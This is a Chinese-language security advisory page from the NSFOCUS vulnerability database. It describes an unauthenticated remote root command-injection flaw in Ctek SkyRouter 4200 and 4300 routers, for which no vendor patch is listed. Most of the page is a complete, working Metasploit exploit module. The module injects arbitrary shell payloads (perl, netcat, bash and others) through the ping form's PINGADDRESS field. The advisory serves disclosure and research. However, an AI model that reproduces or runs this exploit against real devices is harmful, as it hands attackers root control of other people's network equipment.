绿盟科技NSFOCUS安全漏洞系统

安全研究

安全漏洞

Ctek SkyRouter 4200和4300系列路由器远程任意命令执行漏洞

发布日期：2011-11-30
更新日期：2011-12-02

受影响系统：

Ctek SkyRouter 4300
Ctek SkyRouter 4200

描述：

BUGTRAQ ID: 50867

SkyRouter是Ctek的旗舰产品，可管理无线IP连接到其他端点的路由器。Ctek是生产和设计基于Linux的无线/有线网络路由器和服务器。

Ctek SkyRouter 4200和4300系列路由器在实现上存在远程任意命令执行漏洞，远程攻击者可利用此漏洞以超级用户权限执行任意shell命令，控制受影响设备。

<*来源：savant42
*>

测试方法：

警告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

savant42 （）提供了如下测试方法：
##
# $Id: generic_exec.rb 11180 2010-11-30 20:19:18Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'CTEK SkyRouter 4200 and 4300 Command Execution',
            'Description'    => %q{
                    This module exploits an unauthenticated remote root exploit within ctek SkyRouter 4200 and 4300.
            },
            'Author'         => [ 'savant42 (with module help from kos)' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision: 11180 $',
            'References'     => [ ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Space'       => 1024,
                    'Compat'      =>
                        {
                            'PayloadType' => 'cmd',
                            'RequiredCmd' => 'generic perl telnet netcat-e bash',
                        }
                },
            'Platform'       => 'unix',
            'Arch'           => ARCH_CMD,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Sep 8 2011', # CGI historical date :)
            'DefaultTarget' => 0))

    end

    def exploit
        post_data = "MYLINK=%2Fapps%2Fa3%2Fcfg_ethping.cgi&CMD=u&PINGADDRESS=;" + Rex::Text.uri_encode(payload.encoded) + "+%26"
        uri    = '/apps/a3/cfg_ethping.cgi'
        print_status("Sending HTTP request for #{uri}")
        res = send_request_cgi( {
            'global' => true,
            'uri'    => uri,
            'method' => "POST",
            'data' => post_data
        }, 30)

        if res
            print_status("The server responded with HTTP CODE #{res.code}")
        else
            print_status("The server did not respond to our request")
        end

        handler
    end

end

建议：

厂商补丁：

Ctek
----
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.ctekproducts.com/

浏览次数：2529
严重程度：0（网友投票）

关于我们: 公司介绍; 公司荣誉; 公司新闻

联系我们: 公司总部; 分支机构; 海外机构

快速链接: 绿盟云; 绿盟威胁情报中心NTI; 技术博客